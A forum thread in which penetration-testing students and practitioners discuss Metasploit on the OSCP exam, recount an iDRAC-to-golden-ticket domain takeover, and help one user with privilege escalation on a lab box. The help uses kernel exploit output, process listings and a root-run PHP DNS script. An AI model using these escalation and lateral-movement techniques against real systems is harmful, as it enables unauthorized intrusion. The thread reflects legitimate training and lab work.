Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us $3,400 per month for bandwidth bills alone, and since we don't believe in shoving popup ads to our registered users, we try to make the money back through forum registrations.
  • Post
  • Reply
spankmeister
Jun 15, 2008








Slippery Tilde

Achmed Jones posted:

You don't need meterpreter for anything on the exam. You can use it if you really want, but it's by no means necessary. If you really need it, you goofed

True, but there is no reason to limit yourself if you're smart about it. If there is a machine that you're struggling with and you know there's a module that does what you're trying to do effortlessly you can save yourself a lot of time.

There's no shame in using it if you think you need to. Just make drat sure to choose wisely.

Adbot
ADBOT LOVES YOU

CyberPingu
Sep 15, 2013

Ready To Ruck!





Achmed Jones posted:

You don't need meterpreter for anything on the exam. You can use it if you really want, but it's by no means necessary. If you really need it, you goofed

I'd use it for a quick win if I'm near my time limit and need a quick win on the last box.

I'm gonna try avoid it as everything in there has another script somewhere. Or at least I've found so far anyway.

wolrah
May 8, 2006
what?


astral posted:

Loved that one of those classic Mac OS "Desktop Security" programs was called Foolproof and simply disabling extensions was enough to stop it.
I had forgotten the name of the one I ran in to most but that was it! I guess it's name was accurate in a way, it was resistant to total fools but anyone else who wanted to could get past it pretty easily.

RFC2324
Jun 7, 2012

Http 418


CyberPingu posted:

I'd use it for a quick win if I'm near my time limit and need a quick win on the last box.

I'm gonna try avoid it as everything in there has another script somewhere. Or at least I've found so far anyway.

I thought all it was is a collection of external scripts brought together in one handy tool?

CyberPingu
Sep 15, 2013

Ready To Ruck!





RFC2324 posted:

I thought all it was is a collection of external scripts brought together in one handy tool?

They have to be Ruby modules

Searchsploit is the database of scripts


Metasploit also turns all this stuff into very much a "click and go" type thing where you just set your options (e g target host, port etc) and type run and it does it for you

Other scripts you need to find how to use them, edit things you need etc.

CyberPingu fucked around with this message at 14:46 on Sep 3, 2020

RFC2324
Jun 7, 2012

Http 418


CyberPingu posted:

They have to be Ruby modules

Searchsploit is the database of scripts


Metasploit also turns all this stuff into very much a "click and go" type thing where you just set your options (e g target host, port etc) and type run and it does it for you

Other scripts you need to find how to use them, edit things you need etc.

Didn't realize they had to be ruby modules, but the rest is what I would expect from a tool that unifies a bunch of scripts: for the scripts to be modified to accept variables passed from the command-line(and hence passed from the organization tool)

spankmeister
Jun 15, 2008








Slippery Tilde

RFC2324 posted:

I thought all it was is a collection of external scripts brought together in one handy tool?

It is that but meterpreter is very powerful since it automates away a lot of things for you. When you get a session established you can attempt several local privilege escalation methods automatically, migrate the process away from the unstable exploited process to a more stable one, load modules in memory like mimikatz, open up port forwards for pivoting to other networks, etc.

All of which you can do manually, but it's just plumbed together really well and very easy to use. Way less error prone etc. Which is a plus when it's 4AM and you're tired.

I'm not some kind of metasploit fanboy or anything but it definitely gets dunked on way too much because some people say it's not 1337 enough or whatever.

Wiggly Wayne DDS
Sep 11, 2010





Nap Ghost

only time i'll dump on metasploit and variants are where they're used in training courses to do payload generation, etc with no attempt to show how to write your own

CyberPingu
Sep 15, 2013

Ready To Ruck!





Wiggly Wayne DDS posted:

only time i'll dump on metasploit and variants are where they're used in training courses to do payload generation, etc with no attempt to show how to write your own

Thats not training people really, its teaching them to be script kiddies.

Its why i really like IppSecs stuff as if they do use MS they then show you a way not using it too

Balsa
May 10, 2020

Turbo Nerd


CyberPingu posted:

Thats not training people really, its teaching them to be script kiddies.

Its why i really like IppSecs stuff as if they do use MS they then show you a way not using it too

MS is a means to a end. It really depends on what you are doing. I find its better to understand the issue of why the exploit even works so you can tell blue team how to prevent a issue like this from being a issue in the first place!

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

MS is a means to a end. It really depends on what you are doing. I find its better to understand the issue of why the exploit even works so you can tell blue team how to prevent a issue like this from being a issue in the first place!

Dont get me wrong its a great tool. Especially for time based poo poo like CTFs. But personally, if I was building Pen Test training id try stay away from it until the course covers how the exploits work. Its pointless getting someone to run Eternal Blue in a test environment without them understanding the whys and hows as thats not teaching someone properly how to look for things.

Balsa
May 10, 2020

Turbo Nerd


CyberPingu posted:

Dont get me wrong its a great tool. Especially for time based poo poo like CTFs. But personally, if I was building Pen Test training id try stay away from it until the course covers how the exploits work. Its pointless getting someone to run Eternal Blue in a test environment without them understanding the whys and hows as thats not teaching someone properly how to look for things.

and the dangers of running random exploits on systems.

Don't forget that most of the NSA Exploits have something like a 45% BSOD rate.

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

and the dangers of running random exploits on systems.

Don't forget that most of the NSA Exploits have something like a 45% BSOD rate.

Yep,

Again, if you are pentesting, you are basically never going to use any of the DoS exploits in MS either, but if you havent been taught the difference between remote code execution and denial of service, you are just going to run whatever MS shows as a "match" for your search.

Balsa
May 10, 2020

Turbo Nerd


CyberPingu posted:

Yep,

Again, if you are pentesting, you are basically never going to use any of the DoS exploits in MS either, but if you havent been taught the difference between remote code execution and denial of service, you are just going to run whatever MS shows as a "match" for your search.

Well... The RCEs can cause DoS in most of the service/kernel level exploits. MS17-10 loves to BSOD boxes that have been running too long.

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

Well... The RCEs can cause DoS in most of the service/kernel level exploits. MS17-10 loves to BSOD boxes that have been running too long.

Yeah i meant explicit denial of service attacks. Not accidental ones

MS17 does warn you that it can do that though. Which i always found funny that exploit code comes with a usage warning

Balsa
May 10, 2020

Turbo Nerd


CyberPingu posted:

They have to be Ruby modules

Searchsploit is the database of scripts


Metasploit also turns all this stuff into very much a "click and go" type thing where you just set your options (e g target host, port etc) and type run and it does it for you

Other scripts you need to find how to use them, edit things you need etc.

had to do that for a iDrac exploit, had coded IP/PORT in the C code that got cross compiled into another processor (Its the same processor as the dreamcast!) Kali didn't have GCC for it anymore. that to spin up a old debian VM and hand compile it. then edit the crap out of the python script to skip the compile and just send it the elf I had hand compiled.

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

had to do that for a iDrac exploit, had coded IP/PORT in the C code that got cross compiled into another processor (Its the same processor as the dreamcast!) Kali didn't have GCC for it anymore. that to spin up a old debian VM and hand compile it. then edit the crap out of the python script to skip the compile and just send it the elf I had hand compiled.

Amazing.

Balsa
May 10, 2020

Turbo Nerd



My DA Path for that pentest was iDrac>Esxi>Old Windows Template>Extract Local Admin Password>Unused, scan network for ssh>found vsphere ssh with that password>clone DC into a new VM>extract krbtgt hash>Create domain admin user using golden ticket -- One of the more interesting pens

the exploit was CVE-2018-1207

I do other hacking shenanigans over at https://www.youtube.com/watch?v=PtCk3OMeV5g

CyberPingu
Sep 15, 2013

Ready To Ruck!





Balsa posted:

My DA Path for that pentest was iDrac>Esxi>Old Windows Template>Extract Local Admin Password>Unused, scan network for ssh>found vsphere ssh with that password>clone DC into a new VM>extract krbtgt hash>Create domain admin user using golden ticket -- One of the more interesting pens

the exploit was CVE-2018-1207

Thats cool. theres always a reused password somewhere. Or a VM that hasnt been removed.

RFC2324
Jun 7, 2012

Http 418


Balsa posted:

and the dangers of running random exploits on systems.

Last time I played with metasploit I saw the "hail mary" button and started cackling

Achmed Jones
Oct 16, 2004









Shredded Hen

spankmeister posted:

True, but there is no reason to limit yourself if you're smart about it. If there is a machine that you're struggling with and you know there's a module that does what you're trying to do effortlessly you can save yourself a lot of time.

There's no shame in using it if you think you need to. Just make drat sure to choose wisely.

my point is that the boxes they use on the exam are designed such that there's not going to be meterpreter win buttons. you don't have to strategize around this or "make drat sure to choose wisely" because the exams are designed not to be "lol did you pick the right module".

e: iirc you were allowed to use meterpreter as your payload as many times as you want, but could only use its modules (or non-meterpreter metasploit modules) once. i could be 100% misremembering that part though

e2: forgot the word "once" lol

Achmed Jones fucked around with this message at 15:36 on Sep 5, 2020

Mopp
Oct 29, 2004



I'm trying to do a couple of OSCP like boxes, but I'm stuck at privesc on a particularly difficult box.

code:
Linux version 4.13.0-21-generic (buildd@lgw01-amd64-037) (gcc version 7.2.0 (Ubuntu 7.2.0-8ubuntu3)) #24-Ubuntu SMP Mon Dec 18 17:29:16 UTC 2017       
This kernel should be vulnerable to https://github.com/brl/grlh, but I can't get it to work. The BPF flags are correct.
code:
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8be0e1a22600
[*] Leaking sock struct from ffff8be0c1609000
[!] failed to find sk_rcvtimeo.
Other than that, there are two things that stand out on the box.

1. My low priv user is a member of ubuntu group.
2. PHP is running a DNS server with some other weird PHP program.
3. I have a valid user account and am logged in using telnet. SSH is patched and certs only.

I can't find any writeable files with the ubuntu group, and I can't find any SUID/SGID/cron/etc misconfigurations that can be used. I have a hint on the box, and that is that a software exploit is the way to get root.

Output from ps:
code:
_chrony   1768  0.0  0.0 105564   360 ?        S    Sep02   0:00 /usr/sbin/chronyd
daemon     821  0.0  0.0  28328   208 ?        Ss   Sep02   0:00 /usr/sbin/atd -f
message+   974  0.0  0.1  50172  1184 ?        Ss   Sep02   0:04 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only0  0.3  76764  1884 ?        Ss   07:29   0:00 /lib/systemd/systemd --user
root         1  0.0  0.5 225540  3012 ?        Ss   Sep02   0:11 /sbin/init
root       393  0.0  0.8 185320  5016 ?        D<s  Sep02   0:55 /lib/systemd/systemd-journald
root       406  0.0  0.0 105900   184 ?        Ss   Sep02   0:00 /sbin/lvmetad -f
root       414  0.0  0.4  44516  2532 ?        Ss   Sep02   0:03 /lib/systemd/systemd-udevd
root       834  0.0  1.3 170832  7804 ?        Ssl  Sep02   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       844  0.0  1.0 310548  6456 ?        Ss   Sep02   0:31 php /usr/bin/php-dns
root       862  0.0  0.0  31744   300 ?        Ss   Sep02   0:00 /usr/sbin/cron -f
root       875  0.0  0.1  70684   840 ?        Ss   Sep02   0:02 /lib/systemd/systemd-logind
root      1133  0.0  0.2 295004  1376 ?        Ssl  Sep02   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1186  0.0  0.0  16412   144 ttyS0    Ss+  Sep02   0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
root      1246  0.0  0.0  14888   132 tty1     Ss+  Sep02   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1580  0.0  2.6  79860 15632 ?        Ss   Sep02   0:10 /usr/bin/python3 /usr/bin/google_network_daemon
root      1582  0.0  2.6  79860 15692 ?        Ss   Sep02   0:15 /usr/bin/python3 /usr/bin/google_accounts_daemon
root      1583  0.0  2.5  79660 15356 ?        Ss   Sep02   0:08 /usr/bin/python3 /usr/bin/google_clock_skew_daemon
root      1594  0.0  0.1  72296   760 ?        Ss   Sep02   0:00 /usr/sbin/sshd -D
root      3771  0.0  0.0  19348   216 ?        Ss   07:29   0:00 in.telnetd: ::ffff:10.0.0.2
root      3772  0.0  0.0  80820   576 pts/0    Ss   07:29   0:00 login -h ::ffff:10.0.0.2 -p
root     15644  0.0  0.0   4552    60 ?        Ss   08:27   0:00 /usr/sbin/acpid
syslog    1036  0.0  0.3 263044  1996 ?        Ssl  Sep02   0:24 /usr/sbin/rsyslogd -n
systemd+   649  0.0  0.1  71848   944 ?        Ss   Sep02   0:00 /lib/systemd/systemd-networkd
systemd+   665  0.0  0.1  70760   856 ?        Ss   Sep02   0:18 /lib/systemd/systemd-resolved
uuidd    15685  0.0  0.0  28596   184 ?        Ss   08:27   0:00 /usr/sbin/uuidd --socket-activation
www-data  1426  0.0  0.8 516112  5032 ?        S    Sep02   0:00 php-fpm: pool www
www-data  1427  0.0  0.8 516112  5032 ?        S    Sep02   0:00 php-fpm: pool www
ss:
code:
/tmp$ ss -lt
State            Recv-Q             Send-Q                          Local Address:Port                           Peer Address:Port            
LISTEN           0                  128                             127.0.0.53%lo:domain                              0.0.0.0:*               
LISTEN           0                  128                                   0.0.0.0:ssh                                 0.0.0.0:*               
LISTEN           0                  128                                      [::]:ssh                                    [::]:*               
LISTEN           0                  128                                         *:telnet                                    *:*       
The priv esc shouldn't be that difficult, so maybe I've missed something in my enumeration. If you have any tips on the PHP part, I'll gladly take them.

siggy2021
Mar 8, 2010


Mopp posted:

I'm trying to do a couple of OSCP like boxes, but I'm stuck at privesc on a particularly difficult box.

code:
Linux version 4.13.0-21-generic (buildd@lgw01-amd64-037) (gcc version 7.2.0 (Ubuntu 7.2.0-8ubuntu3)) #24-Ubuntu SMP Mon Dec 18 17:29:16 UTC 2017       
This kernel should be vulnerable to https://github.com/brl/grlh, but I can't get it to work. The BPF flags are correct.
code:
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8be0e1a22600
[*] Leaking sock struct from ffff8be0c1609000
[!] failed to find sk_rcvtimeo.
Other than that, there are two things that stand out on the box.

1. My low priv user is a member of ubuntu group.
2. PHP is running a DNS server with some other weird PHP program.
3. I have a valid user account and am logged in using telnet. SSH is patched and certs only.

I can't find any writeable files with the ubuntu group, and I can't find any SUID/SGID/cron/etc misconfigurations that can be used. I have a hint on the box, and that is that a software exploit is the way to get root.

Output from ps:
code:
_chrony   1768  0.0  0.0 105564   360 ?        S    Sep02   0:00 /usr/sbin/chronyd
daemon     821  0.0  0.0  28328   208 ?        Ss   Sep02   0:00 /usr/sbin/atd -f
message+   974  0.0  0.1  50172  1184 ?        Ss   Sep02   0:04 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only0  0.3  76764  1884 ?        Ss   07:29   0:00 /lib/systemd/systemd --user
root         1  0.0  0.5 225540  3012 ?        Ss   Sep02   0:11 /sbin/init
root       393  0.0  0.8 185320  5016 ?        D<s  Sep02   0:55 /lib/systemd/systemd-journald
root       406  0.0  0.0 105900   184 ?        Ss   Sep02   0:00 /sbin/lvmetad -f
root       414  0.0  0.4  44516  2532 ?        Ss   Sep02   0:03 /lib/systemd/systemd-udevd
root       834  0.0  1.3 170832  7804 ?        Ssl  Sep02   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       844  0.0  1.0 310548  6456 ?        Ss   Sep02   0:31 php /usr/bin/php-dns
root       862  0.0  0.0  31744   300 ?        Ss   Sep02   0:00 /usr/sbin/cron -f
root       875  0.0  0.1  70684   840 ?        Ss   Sep02   0:02 /lib/systemd/systemd-logind
root      1133  0.0  0.2 295004  1376 ?        Ssl  Sep02   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1186  0.0  0.0  16412   144 ttyS0    Ss+  Sep02   0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
root      1246  0.0  0.0  14888   132 tty1     Ss+  Sep02   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1580  0.0  2.6  79860 15632 ?        Ss   Sep02   0:10 /usr/bin/python3 /usr/bin/google_network_daemon
root      1582  0.0  2.6  79860 15692 ?        Ss   Sep02   0:15 /usr/bin/python3 /usr/bin/google_accounts_daemon
root      1583  0.0  2.5  79660 15356 ?        Ss   Sep02   0:08 /usr/bin/python3 /usr/bin/google_clock_skew_daemon
root      1594  0.0  0.1  72296   760 ?        Ss   Sep02   0:00 /usr/sbin/sshd -D
root      3771  0.0  0.0  19348   216 ?        Ss   07:29   0:00 in.telnetd: ::ffff:10.0.0.2
root      3772  0.0  0.0  80820   576 pts/0    Ss   07:29   0:00 login -h ::ffff:10.0.0.2 -p
root     15644  0.0  0.0   4552    60 ?        Ss   08:27   0:00 /usr/sbin/acpid
syslog    1036  0.0  0.3 263044  1996 ?        Ssl  Sep02   0:24 /usr/sbin/rsyslogd -n
systemd+   649  0.0  0.1  71848   944 ?        Ss   Sep02   0:00 /lib/systemd/systemd-networkd
systemd+   665  0.0  0.1  70760   856 ?        Ss   Sep02   0:18 /lib/systemd/systemd-resolved
uuidd    15685  0.0  0.0  28596   184 ?        Ss   08:27   0:00 /usr/sbin/uuidd --socket-activation
www-data  1426  0.0  0.8 516112  5032 ?        S    Sep02   0:00 php-fpm: pool www
www-data  1427  0.0  0.8 516112  5032 ?        S    Sep02   0:00 php-fpm: pool www
ss:
code:
/tmp$ ss -lt
State            Recv-Q             Send-Q                          Local Address:Port                           Peer Address:Port            
LISTEN           0                  128                             127.0.0.53%lo:domain                              0.0.0.0:*               
LISTEN           0                  128                                   0.0.0.0:ssh                                 0.0.0.0:*               
LISTEN           0                  128                                      [::]:ssh                                    [::]:*               
LISTEN           0                  128                                         *:telnet                                    *:*       
The priv esc shouldn't be that difficult, so maybe I've missed something in my enumeration. If you have any tips on the PHP part, I'll gladly take them.

Nothing in there is jumping out at me right away, but it's also late and I'm laying in bed looking at it in my phone. Can you give any context in what this is from? Is it an OSCP lab box? Htb? Vulnhub?

If you can throw me what it's on and it's something I can access I may take a stab at trying it out and doing some enumeration.

Mopp
Oct 29, 2004



siggy2021 posted:

Nothing in there is jumping out at me right away, but it's also late and I'm laying in bed looking at it in my phone. Can you give any context in what this is from? Is it an OSCP lab box? Htb? Vulnhub?

If you can throw me what it's on and it's something I can access I may take a stab at trying it out and doing some enumeration.

The box is from an free ethical hacking course at a local school. So it's a OSCP-like lab network, and I have the general goals and hints for how to get the flags on each box. On this particular one it's privilege escalation by software exploit.


I'll go over it again and see if something pops out, otherwise I'll leave it for a week and get back to it later.

Biowarfare
Nov 8, 2010

I JUST WISH THIS WAS A PONY SO I COULD JERK IT WHILE I PLAY WOW

`file /usr/bin/php-dns` and `cat /usr/bin/php-dns`, anything? it is likely php source.

Mopp
Oct 29, 2004



Biowarfare posted:

`file /usr/bin/php-dns` and `cat /usr/bin/php-dns`, anything? it is likely php source.

Yeah, seems to be running https://github.com/yswery/PHP-DNS-SERVER.

code:
$ cat /usr/bin/php-dns
#!/usr/bin/env php
# vi:ft=php.jinja2
<?php

function expand_tilde($path) {
  if (function_exists('posix_getuid') && strpos($path, '~') !== false) {
    $info = posix_getpwuid(posix_getuid());
      $path = str_replace('~', $info['dir'], $path);
  }
  return $path;
}

require_once expand_tilde("~/.composer/vendor/autoload.php");

$record_file = '/etc/php-dns/dns_records.json';

// JsonResolver created and provided with path to file with json dns records
$jsonResolver = new yswery\DNS\Resolver\JsonResolver([$record_file]);

// System resolver acting as a fallback to the JsonResolver
$systemResolver = new yswery\DNS\Resolver\SystemResolver();

// StackableResolver will try each resolver in order and return the first match
$stackableResolver = new yswery\DNS\Resolver\StackableResolver([$jsonResolver, $systemResolver]);

// Create the eventDispatcher and add the event subscribers
$eventDispatcher = new \Symfony\Component\EventDispatcher\EventDispatcher();
$eventDispatcher->addSubscriber(new \yswery\DNS\Event\Subscriber\EchoLogger());
$eventDispatcher->addSubscriber(new \yswery\DNS\Event\Subscriber\ServerTerminator());

// Create a new instance of Server class
$server = new yswery\DNS\Server($stackableResolver, $eventDispatcher, '0.0.0.0', 53);

// Start DNS server
$server->start();

edit:

well, i can read the google cloud cfg file and the ubuntu user is locked. no joy there.
code:
system_info:
   # This will affect which distro class gets used
   distro: ubuntu
   # Default user name + that default users groups (if added/used)
   default_user:
     name: ubuntu
     lock_passwd: True
     gecos: Ubuntu
     groups: [adm, audio, cdrom, dialout, dip, floppy, lxd, netdev, plugdev, sudo, video]
     sudo: ["ALL=(ALL) NOPASSWD:ALL"]
     shell: /bin/bash
I found that screen is an exploitable version (4.06) but lacks suid so no joy.

So only current lead is PHP.

There is a binary in the profile path, but not sure on how to exploit it if possible.

code:
$ cat /etc/profile.d/composer.sh 
export PATH=$PATH:~/.composer/vendor/bin

Mopp fucked around with this message at 11:34 on Sep 6, 2020

Achmed Jones
Oct 16, 2004









Shredded Hen

Composer is a php dependency manager. I don't know of any exploits in it that would be helpful, unless you can perhaps abuse its search path to load code your code

Subjunctive
Sep 12, 2006

careful now


Cybernetic Crumb

It's gotta be in the PHP stuff because there's no reason whatsoever to actually run PHP DNS, and without dropping privileges no less. Can you look at the source to the DNS resolver itself? It may have something you can exploit.

E: That tilde expansion code is definitely sticking out, though...Can you trick it as to what UID you're running as, and point it to a writeable directory somewhere?

spankmeister
Jun 15, 2008








Slippery Tilde

Mopp posted:

I'm trying to do a couple of OSCP like boxes, but I'm stuck at privesc on a particularly difficult box.




Kernel exploits are generally the last thing I would try to do tbh. That php-dns thing looks VERY suspicious so I would definitely focus on that.

spankmeister fucked around with this message at 21:36 on Sep 6, 2020

Mopp
Oct 29, 2004



Subjunctive posted:

It's gotta be in the PHP stuff because there's no reason whatsoever to actually run PHP DNS, and without dropping privileges no less. Can you look at the source to the DNS resolver itself? It may have something you can exploit.

E: That tilde expansion code is definitely sticking out, though...Can you trick it as to what UID you're running as, and point it to a writeable directory somewhere?

Yeah, I've combed this box for multiple times now and this is the only thing that sticks out. No idea on how to attack the script, and since neither that or PHP is SUID it might be best to go at the source code itself. Feels a bit hardcore for this CTF though, there are no reported vulnerabilities for PHP-DNS.

CyberPingu
Sep 15, 2013

Ready To Ruck!





That sounds a lot harder than most of the OSCP-like boxes I've done.

xtal
Jan 9, 2011



Subjunctive posted:

It's gotta be in the PHP stuff because there's no reason whatsoever to actually run PHP DNS, and without dropping privileges no less. Can you look at the source to the DNS resolver itself? It may have something you can exploit.

E: That tilde expansion code is definitely sticking out, though...Can you trick it as to what UID you're running as, and point it to a writeable directory somewhere?

Yeah, I mean, there is no reason to hand write the expand tilde code, there are library functions for that and it may even work passed straight into require. Moreover, it's looking at the UID when the tilde should be looking at HOME. I would bet very much that the issue is in that function.

edit: that function also breaks with multiple tilde, when the tilde isn't the first character, or when the directory separators aren't lined up

xtal fucked around with this message at 20:21 on Sep 7, 2020

Subjunctive
Sep 12, 2006

careful now


Cybernetic Crumb

xtal posted:

Yeah, I mean, there is no reason to hand write the expand tilde code, there are library functions for that and it may even work passed straight into require. Moreover, it's looking at the UID when the tilde should be looking at HOME. I would bet very much that the issue is in that function.

edit: that function also breaks with multiple tilde, when the tilde isn't the first character, or when the directory separators aren't lined up

it looks at the UID to call the getpw stuff and then the ["dir"] key. I've never seen tilde expansion for home directories work when the tilde isn't the first character. /tmp/~user/thing shouldn't expand to /tmp/home/user/thing, for example

require doesn't expand tildes on its own, and I don't know of a library function that does other than the ones that work their way out to shell execution. what do you have in mind?

xtal
Jan 9, 2011



Subjunctive posted:

it looks at the UID to call the getpw stuff and then the ["dir"] key. I've never seen tilde expansion for home directories work when the tilde isn't the first character. /tmp/~user/thing shouldn't expand to /tmp/home/user/thing, for example

require doesn't expand tildes on its own, and I don't know of a library function that does other than the ones that work their way out to shell execution. what do you have in mind?

So, I googled this to find out, and the code here is exactly the same:

https://compwright.com/2013-09-03/t...pansion-in-php/

As for your example about tilde expansion, I'm agreeing with you, but the provided function that uses str_replace would replace the tilde no matter where it is and no matter how many times it occurs. I was thinking there must be a library function that handles tilde expansion in a way that accounts for those edge cases. Maybe realpath?

E: The strpos call is checking for one tilde at the start, but that's all.

xtal fucked around with this message at 20:56 on Sep 7, 2020

Subjunctive
Sep 12, 2006

careful now


Cybernetic Crumb

xtal posted:

Maybe realpath?

afaik realpath just deals with symlinks and . or .. path components. I think POSIX only acknowledges tilde expansion within shell commands, and has nothing to say that open("~thing/foo") is different from open("./~thing/foo")

xtal
Jan 9, 2011



Since I have most experience with Ruby I was looking toward File.expand_path which does work for home directories. But since its just copied from somewhere else anyway, it may be a red herring. That snippet is at least 7 years old though so maybe there are some bugs with it that you can research.

EVIL Gibson
Mar 23, 2001

Internet of Things is just someone else's computer that people can't help attaching cameras and door locks to!


Switchblade Switcharoo

xtal posted:

So, I googled this to find out, and the code here is exactly the same:

https://compwright.com/2013-09-03/t...pansion-in-php/

As for your example about tilde expansion, I'm agreeing with you, but the provided function that uses str_replace would replace the tilde no matter where it is and no matter how many times it occurs. I was thinking there must be a library function that handles tilde expansion in a way that accounts for those edge cases. Maybe realpath?

E: The strpos call is checking for one tilde at the start, but that's all.

Composer file and PHP dns might be related

There was an exploit where composer doesn't check the validity of the download source

https://cxsecurity.com/issue/WLB-2015050082


This is usually done by arp spoofing but maybe you can do something cool with phpdns since you can change the DNS json config file via command line.

spankmeister
Jun 15, 2008








Slippery Tilde

This all seems a bit convoluted for the average OSCP-like boot2root VM. It should be simpler than that I would think.

CyberPingu
Sep 15, 2013

Ready To Ruck!





spankmeister posted:

This all seems a bit convoluted for the average OSCP-like boot2root VM. It should be simpler than that I would think.

Yeah that's what I've been thinking too. Like, it's not the worst idea to do boxes that are tougher than the OSCP ones. But you might end up overthinking the exam when you get in.

Adbot
ADBOT LOVES YOU

Achmed Jones
Oct 16, 2004









Shredded Hen

I'm guessing it's not actually that involved and somethings been overlooked. Maybe ~/.composer/vendor/autoload.php is world writeable in /root and was missed, for example

  • 1
  • 2
  • 3
  • 4
  • 5
  • Post
  • Reply